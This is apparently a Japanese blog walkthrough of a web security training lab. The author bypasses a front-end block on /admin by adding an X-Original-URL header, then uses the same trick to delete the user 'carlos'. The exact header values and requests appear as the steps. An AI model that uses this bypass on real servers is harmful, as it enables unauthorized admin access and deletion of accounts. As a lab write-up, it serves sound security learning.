Lab: URL-based access control can be circumvented
/admin にアクセスすると、Access denied
![](https://blog.esna.tech/wp-content/uploads/2023/01/2-62-1024x763.jpg)
*応答が単純なので、フロント・バックサーバー構成で、フロントサーバーが
返した応答かも。
/ にアクセス
このリクエストをリピータに。
HTTP ヘッダーを追加
X-Original-URL: /invalid
send
404 not foundを確認
![](https://blog.esna.tech/wp-content/uploads/2023/01/3-63-1024x763.jpg)
これは、バックエンドサーバーが返したレスポンス
X-Original-URL: /admin
に変更して
send
![](https://blog.esna.tech/wp-content/uploads/2023/01/4-52-1024x763.jpg)
200が返って、正常に処理された模様
/admin/delete?username=carlos
のリンクがある
リピータで
X-Original-URL: /admin/delete
リクエストライン /?username=carlos
に変更して
send
![](https://blog.esna.tech/wp-content/uploads/2023/01/5-40-1024x763.jpg)
クリア!
–)v
コメント